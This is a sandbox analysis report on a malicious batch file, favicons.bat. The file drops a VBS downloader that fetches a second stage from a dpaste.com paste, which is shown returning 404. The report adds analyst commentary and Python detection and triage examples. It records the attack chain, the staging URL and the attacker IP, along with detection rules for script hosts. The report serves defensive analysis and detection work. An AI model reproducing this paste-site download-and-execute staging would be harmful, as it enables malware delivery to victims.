
Windows Analysis Report
favicons.bat

Overview

General Information

Sample name: favicons.bat
Analysis ID: 1646806
MD5: 50c0f17b4addbc0d98f32424c0b55126
SHA1: a2f08d69be6b8ff0a7619cdf0149f5711aeb3a04
SHA256: 26f90d8432f13b001842cf15250cfefc867b74ffd22ee0fc0afce1087e5f9f91
Tags: 104-168-7-32, bat, user-JAMESWT_MHT

Detection

Score: 88
Range: 0 - 100
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Yara detected VBS Downloader Generic
Command shell drops VBS files
Connects to a pastebin service (likely for C&C)
Sigma detected: Script Initiated Connection to Non-Local Network
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Script Initiated Connection
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication

Classification

Classification label: mal88.spre.troj.evad.winBAT@6/2@3/1 (malicious, score 88; spreading, trojan, evader)

Process Tree

  • System is w10x64
  • cmd.exe (PID: 6712, cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\favicons.bat" ", MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 6740, cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • wscript.exe (PID: 6844, cmdline: wscript //nologo "C:\Windows\Temp\trickishly.vbs", MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • timeout.exe (PID: 6864, cmdline: timeout /t 1 /nobreak, MD5: 100065E21CFBBDE57CBA2838921F84D6)

The batch file's only observable job is to write trickishly.vbs into C:\Windows\Temp, hand it to wscript.exe and wait one second; every network event in this report originates from that wscript.exe process (PID 6844).

Malware Configuration

No configs have been found

Yara Overview

Source: C:\Windows\Temp\trickishly.vbs | Rule: JoeSecurity_VBS_Downloader_Generic | Description: Yara detected VBS Downloader Generic | Author: Joe Security

    System Summary

    Source: Network Connection | Author: frack113, Florian Roth | Data: DestinationIp: 35.173.69.207, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 6844, Protocol: tcp, SourceIp: 192.168.2.8, SourceIsIpv6: false, SourcePort: 49692
    Source: Process started | Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) | Data: Command: wscript //nologo "C:\Windows\Temp\trickishly.vbs", CommandLine: wscript //nologo "C:\Windows\Temp\trickishly.vbs", CommandLine|base64offset|contains: +, Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\favicons.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6712, ParentProcessName: cmd.exe, ProcessCommandLine: wscript //nologo "C:\Windows\Temp\trickishly.vbs", ProcessId: 6844, ProcessName: wscript.exe
    Source: Process started | Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton | Data: same process-creation event as the entry above
    Source: Network Connection | Author: frack113 | Data: same network-connection event as the first entry above
    Source: Process started | Author: Michael Haag | Data: same process-creation event as the second entry above
    No Suricata rule has matched

    All five Sigma hits rest on two events: the creation of wscript.exe (PID 6844) by cmd.exe with a script path under C:\Windows\Temp, and that process's own outbound TCP connection to 35.173.69.207:443 (Sysmon EventID 3). The absence of a Suricata match is unsurprising, since the only traffic is a TLS 1.2 session on port 443 with nothing in cleartext for a network rule to inspect.
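The following Python is an added example, not Joe Sandbox or Sigma project code. It replays the two events behind the Sigma hits as constructed Sysmon-style records (field names follow the Sigma data above), adds a benign wscript.exe logon script as a control, and implements simplified versions of the three distinct checks that fired: script interpreter launched from a suspicious folder, script file executed via cscript/wscript, and script-initiated connection to a non-local address. The folder list, the explorer.exe/userinit.exe parents and the PID 7001 control records are assumptions; the PIDs, command lines and addresses for PID 6844 are taken from the report.

```python
"""Sysmon-style replay of this report's process and network telemetry with
simplified Sigma-style checks. Added example; records are constructed."""
import ipaddress
import re
from typing import Callable, Dict, List

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
# Folders treated as suspicious launch locations (assumed list; the report's
# hit is C:\Windows\Temp). Compared case-insensitively against the command line.
SUSPICIOUS_DIRS = (r"\windows\temp", r"\appdata\local\temp", r"\users\public", r"\programdata")
# Script extensions; the lookahead stops ".js" from matching ".json".
SCRIPT_FILE_RE = re.compile(r"\.(vbs|vbe|js|jse|wsf|wsh)(?=\W|$)", re.IGNORECASE)


def image_name(path: str) -> str:
    """Basename of an Image/ParentImage path, lower-cased."""
    return path.rsplit("\\", 1)[-1].lower()


def is_non_local(ip: str) -> bool:
    """True for routable destinations; RFC1918, loopback, link-local etc. are local."""
    addr = ipaddress.ip_address(ip)
    return not (addr.is_private or addr.is_loopback or addr.is_link_local
                or addr.is_multicast or addr.is_reserved or addr.is_unspecified)


def script_interpreter_from_suspicious_folder(ev: dict) -> bool:
    if ev["EventID"] != 1 or image_name(ev["Image"]) not in SCRIPT_HOSTS:
        return False
    cmd = ev["CommandLine"].lower()
    return any(d in cmd for d in SUSPICIOUS_DIRS)


def script_file_via_cscript_wscript(ev: dict) -> bool:
    if ev["EventID"] != 1 or image_name(ev["Image"]) not in SCRIPT_HOSTS:
        return False
    return SCRIPT_FILE_RE.search(ev["CommandLine"]) is not None


def script_initiated_connection_to_non_local(ev: dict) -> bool:
    if ev["EventID"] != 3 or not ev.get("Initiated", False):
        return False
    return image_name(ev["Image"]) in SCRIPT_HOSTS and is_non_local(ev["DestinationIp"])


RULES: Dict[str, Callable[[dict], bool]] = {
    "script_interpreter_from_suspicious_folder": script_interpreter_from_suspicious_folder,
    "script_file_via_cscript_wscript": script_file_via_cscript_wscript,
    "script_initiated_connection_to_non_local": script_initiated_connection_to_non_local,
}


def triage(events: List[dict]) -> Dict[int, dict]:
    """Per ProcessId: image, command line, parent, distinct rule hits and destinations."""
    procs: Dict[int, dict] = {}
    for ev in events:
        if ev["EventID"] == 1:
            procs[ev["ProcessId"]] = {"Image": ev["Image"], "CommandLine": ev["CommandLine"],
                                      "ParentImage": ev.get("ParentImage", ""),
                                      "hits": [], "destinations": []}
    for ev in events:
        rec = procs.get(ev["ProcessId"])
        if rec is None:
            continue
        for name, check in RULES.items():
            if check(ev) and name not in rec["hits"]:
                rec["hits"].append(name)
        if ev["EventID"] == 3:
            rec["destinations"].append(f'{ev["DestinationIp"]}:{ev["DestinationPort"]}')
    return procs


def suspicious_pids(events: List[dict], min_hits: int = 2) -> List[int]:
    """PIDs on which at least min_hits distinct rules fired (6844 trips all three)."""
    return sorted(pid for pid, rec in triage(events).items() if len(rec["hits"]) >= min_hits)


# Constructed records. PID 6712/6844/6864 values follow the report; PID 7001
# and its LAN connection are a benign control; parent images are assumed.
EVENTS = [
    {"EventID": 1, "ProcessId": 6712, "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\favicons.bat" "',
     "ParentImage": r"C:\Windows\explorer.exe"},
    {"EventID": 1, "ProcessId": 6844, "Image": r"C:\Windows\System32\wscript.exe",
     "CommandLine": r'wscript //nologo "C:\Windows\Temp\trickishly.vbs"',
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"EventID": 1, "ProcessId": 6864, "Image": r"C:\Windows\System32\timeout.exe",
     "CommandLine": "timeout /t 1 /nobreak", "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"EventID": 3, "ProcessId": 6844, "Image": r"C:\Windows\System32\wscript.exe",
     "Initiated": True, "Protocol": "tcp", "SourceIp": "192.168.2.8", "SourcePort": 49692,
     "DestinationIp": "35.173.69.207", "DestinationPort": 443},
    {"EventID": 1, "ProcessId": 7001, "Image": r"C:\Windows\System32\wscript.exe",
     "CommandLine": r'wscript.exe "\\fs01\netlogon\map_drives.vbs"',
     "ParentImage": r"C:\Windows\System32\userinit.exe"},
    {"EventID": 3, "ProcessId": 7001, "Image": r"C:\Windows\System32\wscript.exe",
     "Initiated": True, "Protocol": "tcp", "SourceIp": "192.168.2.8", "SourcePort": 49700,
     "DestinationIp": "192.168.2.5", "DestinationPort": 445},
]

if __name__ == "__main__":
    for pid, rec in triage(EVENTS).items():
        print(pid, image_name(rec["Image"]), rec["hits"], rec["destinations"])
    print("suspicious:", suspicious_pids(EVENTS))
```

The control shows why the "script file via wscript" check is too noisy to alert on alone: a domain logon script fires it too. Requiring a second, independent signal per process (a suspicious launch folder, or a script-initiated connection leaving the LAN) is what isolates PID 6844.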


    AV Detection

    Source: favicons.bat | Virustotal: Detection: 22%
    Source: unknown | HTTPS traffic detected: 35.173.69.207:443 -> 192.168.2.8:49692 version: TLS 1.2

    Spreading

    Source: Yara match | File source: C:\Windows\Temp\trickishly.vbs, type: DROPPED

    Networking

    Source: C:\Windows\System32\wscript.exe | Network Connect: 35.173.69.207 443
    Source: unknown | DNS query: name: dpaste.com (six identical queries observed)
    Source: Joe Sandbox View | IP Address: 35.173.69.207
    Source: Joe Sandbox View | ASN Name: AMAZON-AESUS
    Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
    Source: global traffic | HTTP traffic detected (request, recorded twice):
        GET /9A4PA9CZ5.txt HTTP/1.1
        Accept: */*
        Accept-Language: en-ch
        UA-CPU: AMD64
        Accept-Encoding: gzip, deflate
        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
        Host: dpaste.com
        Connection: Keep-Alive
    Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 (three occurrences)
    Source: global traffic | DNS traffic detected: DNS query: dpaste.com
    Source: global traffic | HTTP traffic detected (response):
        HTTP/1.1 404 Not Found
        Date: Mon, 24 Mar 2025 08:48:24 GMT
        Content-Type: text/html; charset=UTF-8
        Content-Length: 4133
        Connection: close
        Vary: Accept-Encoding
        Vary: Cookie, origin
        Set-Cookie: messages=.eJwtyUEKwjAQQNGrjLPpJhgR3NWeQnBRShjipI0mGcmk9foWFP7qv3FE554qxWVWpZnRnMz5YvDOyUtmaAKPN2njA9wElLZ9LVGB9iDQJjU2BqkQJCX5_HBVrgZ6gqVyuHaWvJe1NLVJ5lhsN2R6MVCBP_SWhiMaxGn6AiupMQo:1twdTs:_Av55Wbdsul9IKStwrSRihmIjREDzhEy9nTCZNZLhGA; HttpOnly; Path=/; SameSite=Lax
        Server: PythonAnywhere

    Two points matter for reading this run. First, the paste at https://dpaste.com/9A4PA9CZ5.txt was already gone: the server answered 404 with a 4133-byte HTML error page, so no second-stage content was delivered and whatever the VBS would have done with a live paste is not observable here. Second, the User-Agent is not a browser; it is the IE7-compatible string that WinINet supplies for Msxml2.XMLHTTP requests on Windows 10 when the script sets none, which is what the "known web browser user agent" signature is reacting to. The JA3 hash likewise fingerprints the Windows Schannel client stack, not custom malware code.

    Strings found in binary or memory of wscript.exe (the dump identifiers are listed once per group of strings that share them):

    Group A: wscript.exe, 00000002.00000002.1003391663.0000009EC7D75000.00000004.00000010.00020000.00000000.sdmp; 00000002.00000002.1004049773.000001D5F41E0000.00000004.00000020.00020000.00000000.sdmp; 00000002.00000002.1004072874.000001D5F41ED000.00000004.00000020.00020000.00000000.sdmp; 00000002.00000003.1003110131.000001D5F3E85000.00000004.00000020.00020000.00000000.sdmp; 00000002.00000003.1002526300.000001D5F41ED000.00000004.00000020.00020000.00000000.sdmp
        https://dpaste.b-cdn.net/static/pastebin/apple-touch-icon.png
        https://dpaste.b-cdn.net/static/pastebin/css/main.css
        https://dpaste.b-cdn.net/static/pastebin/css/normalize.css
        https://dpaste.b-cdn.net/static/pastebin/css/skeleton.css
        https://dpaste.b-cdn.net/static/pastebin/favicon-16x16.png
        https://dpaste.b-cdn.net/static/pastebin/favicon-32x32.png
        https://dpaste.b-cdn.net/static/pastebin/favicon.ico
        https://dpaste.b-cdn.net/static/pastebin/site.webmanifest
        https://fonts.googleapis.com/css2?family=Fira
        https://fosstodon.org/
    Group B: the Group A dumps without 00000002.00000002.1004072874.000001D5F41ED000.00000004.00000020.00020000.00000000.sdmp
        https://fonts.googleapis.com/css?family=Fira
    Group C: wscript.exe, 00000002.00000002.1004049773.000001D5F41E0000.00000004.00000020.00020000.00000000.sdmp; 00000002.00000003.1002748699.000001D5F41F1000.00000004.00000020.00020000.00000000.sdmp; 00000002.00000003.1003110131.000001D5F3E85000.00000004.00000020.00020000.00000000.sdmp; 00000002.00000003.1002526300.000001D5F41ED000.00000004.00000020.00020000.00000000.sdmp
        https://cdnjs.cloudflare.com/ajax/libs/jquery/3.7.1/jquery.min.js
        https://media.ethicalads.io/media/client/ethicalads.min.js
        https://unpkg.com/htmx.org
    Group D: wscript.exe, 00000002.00000003.1002808390.000001D5F21FA000.00000004.00000020.00020000.00000000.sdmp; 00000002.00000002.1003966687.000001D5F21FC000.00000004.00000020.00020000.00000000.sdmp; 00000002.00000003.1002687222.000001D5F21F5000.00000004.00000020.00020000.00000000.sdmp
        https://dpaste.com/
        https://login.live.com
    Group E: wscript.exe, 00000002.00000002.1003911551.000001D5F21C2000.00000004.00000020.00020000.00000000.sdmp; 00000002.00000003.1002947867.000001D5F21C2000.00000004.00000020.00020000.00000000.sdmp; 00000002.00000003.1002687222.000001D5F21BD000.00000004.00000020.00020000.00000000.sdmp
        https://dpaste.com/9A4PA9CZ5.txtR
        https://dpaste.com/9A4PA9CZ5.txtT;P
        https://dpaste.com/9A4PA9CZ5.txte
    Single entries:
        https://dpaste.com/9A4PA9CZ5.txt: wscript.exe, 00000002.00000002.1003620015.000001D5F20E5000.00000004.00000020.00020000.00000000.sdmp; 00000002.00000003.1002916579.000001D5F219D000.00000004.00000020.00020000.00000000.sdmp; 00000002.00000002.1003966687.000001D5F21FC000.00000004.00000020.00020000.00000000.sdmp; 00000002.00000003.1003075213.000001D5F214A000.00000004.00000020.00020000.00000000.sdmp; 00000002.00000003.1003110131.000001D5F3E85000.00000004.00000020.00020000.00000000.sdmp; 00000002.00000003.1002687222.000001D5F21BD000.00000004.00000020.00020000.00000000.sdmp; 00000002.00000003.1002687222.000001D5F21F5000.00000004.00000020.00020000.00000000.sdmp; 00000002.00000002.1004094756.000001D5F41F4000.00000004.00000020.00020000.00000000.sdmp; favicons.bat; trickishly.vbs.0.dr
        https://dpaste.com/9A4PA9CZ5.txt.: wscript.exe, 00000002.00000003.1002526300.000001D5F41F4000.00000004.00000020.00020000.00000000.sdmp; 00000002.00000002.1004094756.000001D5F41F4000.00000004.00000020.00020000.00000000.sdmp
        https://fonts.googleapis.com/css?: wscript.exe, 00000002.00000002.1004072874.000001D5F41ED000.00000004.00000020.00020000.00000000.sdmp
        https://unpkg.cd: wscript.exe, 00000002.00000002.1003391663.0000009EC7D75000.00000004.00000010.00020000.00000000.sdmp
        https://widget.freshworks.com/widgets/2: wscript.exe, 00000002.00000003.1003110131.000001D5F3E85000.00000004.00000020.00020000.00000000.sdmp
        https://widget.freshworks.com/widgets/22000000180.js: wscript.exe, 00000002.00000003.1002526300.000001D5F41E6000.00000004.00000020.00020000.00000000.sdmp; 00000002.00000003.1002748699.000001D5F41F1000.00000004.00000020.00020000.00000000.sdmp; 00000002.00000003.1002526300.000001D5F41ED000.00000004.00000020.00020000.00000000.sdmp

    Only one of these strings is an attacker indicator: https://dpaste.com/9A4PA9CZ5.txt, which is present in cleartext in favicons.bat itself and in the dropped trickishly.vbs, so it is usable as a static IOC (the .txt., .txtR, .txtT;P and .txte variants are the same string with trailing memory bytes). The dpaste.b-cdn.net, fonts.googleapis.com, cdnjs, unpkg, ethicalads, freshworks and fosstodon URLs are assets referenced by dpaste.com's own HTML error page, held in memory because the 404 response body was buffered; no DNS queries or connections to those hosts appear in the traffic, and nothing indicates the script contacts them.

    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49692
    Source: unknown | Network traffic detected: HTTP traffic on port 49692 -> 443
    Source: unknown | HTTPS traffic detected: 35.173.69.207:443 -> 192.168.2.8:49692 version: TLS 1.2
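The request/response pair above is the kind of artefact an analyst gets from a sandbox PCAP or a TLS-inspecting proxy, and the question it has to answer is whether the stage was actually delivered. The following Python is an added example, not Joe Sandbox code: it parses both messages, flags the paste host, the raw-paste path shape and the non-browser User-Agent, and only reports a delivered stage (with its SHA-256) on a 200 with a non-HTML body. The request and the 404 response headers are transcribed from the report with CRLF line endings restored; the HTML body, the PASTE_HOSTS list and the 200 "live paste" counter-example are assumptions.

```python
"""Triage of a captured HTTP request/response for a paste-site fetch.
Added example; inputs are transcribed from the report or constructed."""
import hashlib
import re
from typing import Dict, Tuple

# Assumed list of paste services; dpaste.com is the one in the report.
PASTE_HOSTS = {"dpaste.com", "pastebin.com", "paste.ee", "rentry.co", "hastebin.com"}
# WinINet/MSXML requests made without an explicit User-Agent carry this
# IE7-compatible string on Windows 10; a current browser does not.
LEGACY_IE_UA = re.compile(r"MSIE 7\.0;.*Trident/7\.0")
# Raw-paste URL shape as observed in the report (/<id>.txt).
RAW_PASTE_PATH = re.compile(r"^/[A-Za-z0-9]+\.txt$")


def parse_http(raw: str) -> Tuple[str, Dict[str, str], str]:
    """Split one HTTP/1.1 message into start line, headers (lower-cased keys) and body."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        if name:
            headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body


def assess_paste_fetch(request_raw: str, response_raw: str) -> dict:
    """Classify the exchange and say whether a second stage was really delivered."""
    req_line, req_h, _ = parse_http(request_raw)
    method, path, _version = req_line.split(" ", 2)
    status_line, resp_h, body = parse_http(response_raw)
    status = int(status_line.split(" ", 2)[1])
    host = req_h.get("host", "").lower()
    content_type = resp_h.get("content-type", "").split(";")[0].strip().lower()
    # Paste sites answer missing or removed pastes with an HTML error page
    # (the report's case: 404, text/html), so a stage counts as delivered only
    # on 200 with a non-HTML, non-empty body.
    delivered = status == 200 and content_type != "text/html" and len(body) > 0
    findings = {
        "method": method,
        "url": f"https://{host}{path}",
        "paste_host": host in PASTE_HOSTS,
        "raw_paste_path": RAW_PASTE_PATH.match(path) is not None,
        "legacy_ie_user_agent": LEGACY_IE_UA.search(req_h.get("user-agent", "")) is not None,
        "status": status,
        "stage_delivered": delivered,
        "stage_sha256": hashlib.sha256(body.encode()).hexdigest() if delivered else None,
    }
    if findings["paste_host"] and findings["raw_paste_path"]:
        findings["verdict"] = "paste_stage_delivered" if delivered else "paste_stage_unavailable"
    else:
        findings["verdict"] = "not_a_paste_fetch"
    return findings


# Transcribed from the report's captured traffic; the HTML body is a short
# constructed stand-in for the 4133-byte dpaste error page.
REPORT_REQUEST = (
    "GET /9A4PA9CZ5.txt HTTP/1.1\r\n"
    "Accept: */*\r\n"
    "Accept-Language: en-ch\r\n"
    "UA-CPU: AMD64\r\n"
    "Accept-Encoding: gzip, deflate\r\n"
    "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; "
    "Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; "
    ".NET CLR 3.5.30729)\r\n"
    "Host: dpaste.com\r\n"
    "Connection: Keep-Alive\r\n\r\n"
)
REPORT_RESPONSE = (
    "HTTP/1.1 404 Not Found\r\n"
    "Date: Mon, 24 Mar 2025 08:48:24 GMT\r\n"
    "Content-Type: text/html; charset=UTF-8\r\n"
    "Content-Length: 4133\r\n"
    "Connection: close\r\n"
    "Server: PythonAnywhere\r\n\r\n"
    "<!doctype html><html><head><title>Not found</title></head><body>Not found</body></html>"
)
# Constructed counter-example: what a still-live raw paste would look like.
LIVE_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Content-Type: text/plain; charset=utf-8\r\n"
    "Content-Length: 28\r\n\r\n"
    "MsgBox \"second stage here\"\r\n"
)

if __name__ == "__main__":
    for label, resp in (("report", REPORT_RESPONSE), ("live", LIVE_RESPONSE)):
        print(label, assess_paste_fetch(REPORT_REQUEST, resp))
```

For the report's exchange the verdict is paste_stage_unavailable with no hash; the same request against the constructed 200 response yields paste_stage_delivered and a body hash that can be pivoted on. Treating the IE7 User-Agent as a browser would be a mistake in a proxy-log hunt: on a Windows 10 fleet it is a reliable marker of WinINet-based scripting clients, and combining it with a paste host and a raw-paste path is a usable hunting query on its own.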

    System Summary

    Source: C:\Windows\System32\wscript.exe | COM Object queried: XML HTTP HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F6D90F16-9C73-11D3-B32E-00C04F990BB4} (the Msxml2.XMLHTTP class; this is the object the VBS uses for its HTTPS download)
    Source: classification engine | Classification label: mal88.spre.troj.evad.winBAT@6/2@3/1
    Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6740:120:WilError_03
    Source: C:\Windows\System32\cmd.exe | File created: C:\Windows\Temp\trickishly.vbs
    Source: unknown | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\favicons.bat" "
    Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wscript.exe wscript //nologo "C:\Windows\Temp\trickishly.vbs"
    Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\timeout.exe timeout /t 1 /nobreak
    Source: C:\Windows\System32\wscript.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers (the Software Restriction Policy lookup the script host performs before running any script; host behaviour, not script behaviour)
    Source: favicons.bat | Virustotal: Detection: 22%
    Source: C:\Windows\System32\cmd.exe | Section loaded: cmdext.dll
    Source: C:\Windows\System32\wscript.exe | Sections loaded, in order: version.dll, kernel.appcore.dll, uxtheme.dll, sxs.dll, vbscript.dll, amsi.dll, userenv.dll, profapi.dll, wldp.dll, msasn1.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, msisip.dll, wshext.dll, scrobj.dll, msxml3.dll, wininet.dll, iertutil.dll, mlang.dll, urlmon.dll, srvcli.dll, netutils.dll, sspicli.dll, windows.storage.dll, ondemandconnroutehelper.dll, winhttp.dll, mswsock.dll, iphlpapi.dll, winnsi.dll, dnsapi.dll, rasadhlp.dll, fwpuclnt.dll, schannel.dll, mskeyprotect.dll, ntasn1.dll, dpapi.dll, gpapi.dll, ncrypt.dll, ncryptsslp.dll
    Source: C:\Windows\System32\timeout.exe | Section loaded: version.dll
    Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32 (the VBScript engine CLSID: wscript.exe resolving the interpreter for a .vbs file)

    The load order of wscript.exe tells the story on its own: vbscript.dll followed by amsi.dll and wldp.dll (the script body is handed to AMSI and checked against Windows Lockdown Policy before it runs, so AMSI provider logs from an EDR are the place to recover the script's deobfuscated content), then msxml3.dll, wininet.dll and urlmon.dll for the XMLHTTP request, then schannel.dll and ncryptsslp.dll for the TLS 1.2 session to dpaste.com.

    Persistence and Installation Behavior

    Source: C:\Windows\System32\cmd.exe | File created: C:\Windows\Temp\trickishly.vbs
    Source: C:\Windows\System32\cmd.exe | Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX (twice)
    Source: C:\Windows\System32\wscript.exe | Window found: window name: WSH-Timer (the hidden timer window wscript.exe creates to implement WScript.Sleep; this is what the "WSH timer" evasion signature keys on)
    Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
    Source: wscript.exe, 00000002.00000003.1002808390.000001D5F2217000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000002.1003966687.000001D5F2217000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
    Source: wscript.exe, 00000002.00000002.1003911551.000001D5F21C2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1002947867.000001D5F21C2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1002687222.000001D5F21BD000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWen-GBn
    Source: wscript.exe, 00000002.00000002.1003911551.000001D5F21C2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1002947867.000001D5F21C2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1002687222.000001D5F21BD000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWpX

    Despite the section title, no persistence mechanism (Run key, scheduled task, startup folder, service) appears anywhere in this report; the dropped file in C:\Windows\Temp is the only installation artefact. The "Hyper-V RAW" strings are the Winsock catalog entry for Hyper-V sockets that exists on every Windows 10 installation and is pulled into memory when a process initialises Winsock; they are not evidence that the script checks for virtualisation.

    HIPS / PFW / Operating System Protection Evasion

    Source: C:\Windows\System32\wscript.exe | Network Connect: 35.173.69.207 443
    Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wscript.exe wscript //nologo "C:\Windows\Temp\trickishly.vbs"
    Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\timeout.exe timeout /t 1 /nobreak
    Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid (this value is also read by CryptoAPI provider initialisation, which the TLS session needs, so on its own it is weak evidence of host fingerprinting)
    MITRE ATT&CK Matrix (techniques with hits; the badge shown in the original matrix cell is kept in parentheses)

    Execution / Defense Evasion: Scripting, T1064 (112)
    Privilege Escalation / Defense Evasion: Process Injection, T1055 (111)
    Persistence / Privilege Escalation / Defense Evasion: DLL Side-Loading, T1574.002 (1)
    Discovery: Security Software Discovery, T1518.001 (1); System Information Discovery, T1082 (2)
    Command and Control: Web Service, T1102 (1); Encrypted Channel, T1573 (1); Non-Application Layer Protocol, T1095 (3); Application Layer Protocol, T1071 (14); Ingress Tool Transfer, T1105 (3)

    No techniques under Reconnaissance, Resource Development, Initial Access, Credential Access, Lateral Movement, Collection, Exfiltration or Impact were matched.
    Behavior Graph (ID: 1646806, sample: favicons.bat, start date: 24/03/2025, architecture: WINDOWS, score: 88)

    Domains: dpaste.com, webapp-837091.pythonanywhere.com (dpaste.com is served from the PythonAnywhere host)
    IP: 35.173.69.207, port 443 (local source port 49692), AMAZON-AESUS, United States, contacted by wscript.exe
    cmd.exe (graph badge 2): dropped C:\Windows\Temp\trickishly.vbs (ASCII); started wscript.exe (graph badge 12), conhost.exe and timeout.exe (graph badge 1)
    Signatures placed on the graph: Multi AV Scanner detection for submitted file; Yara detected VBS Downloader Generic; Sigma detected: Script Initiated Connection to Non-Local Network; Connects to a pastebin service (likely for C&C); Command shell drops VBS files; System process connects to network (likely due to code injection or exploit); Windows Scripting host queries suspicious COM object (likely to drop second stage); 2 other signatures
    Antivirus, Machine Learning and Genetic Malware Detection

    Source: favicons.bat | Detection: 23% | Scanner: Virustotal | Label: (none)
    Source: favicons.bat | Detection: 11% | Scanner: ReversingLabs | Label: Script-WScript.Trojan.Heuristic
    Three further scan tables: No Antivirus matches

    URLs (all 0%, Avira URL Cloud: safe):
        https://dpaste.com/9A4PA9CZ5.txt
        https://dpaste.com/9A4PA9CZ5.txt.
        https://dpaste.com/9A4PA9CZ5.txtR
        https://dpaste.com/9A4PA9CZ5.txte
        https://dpaste.com/9A4PA9CZ5.txtT;P
        https://dpaste.com/
        https://dpaste.b-cdn.net/static/pastebin/css/main.css
        https://dpaste.b-cdn.net/static/pastebin/css/skeleton.css
        https://dpaste.b-cdn.net/static/pastebin/css/normalize.css
        https://dpaste.b-cdn.net/static/pastebin/site.webmanifest
        https://dpaste.b-cdn.net/static/pastebin/favicon-16x16.png
        https://dpaste.b-cdn.net/static/pastebin/favicon-32x32.png
        https://dpaste.b-cdn.net/static/pastebin/favicon.ico
        https://dpaste.b-cdn.net/static/pastebin/apple-touch-icon.png
        https://unpkg.cd

    A "safe" URL-reputation verdict on a public paste service says nothing about the paste's content; the domain is legitimate, which is exactly why it is used for staging.


Name | IP | Active | Malicious | Antivirus Detection | Reputation
webapp-837091.pythonanywhere.com | 35.173.69.207 | true | true |  | unknown
dpaste.com | unknown | unknown | true |  | unknown
Name | Malicious | Antivirus Detection | Reputation
https://dpaste.com/9A4PA9CZ5.txt | true | Avira URL Cloud: safe | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
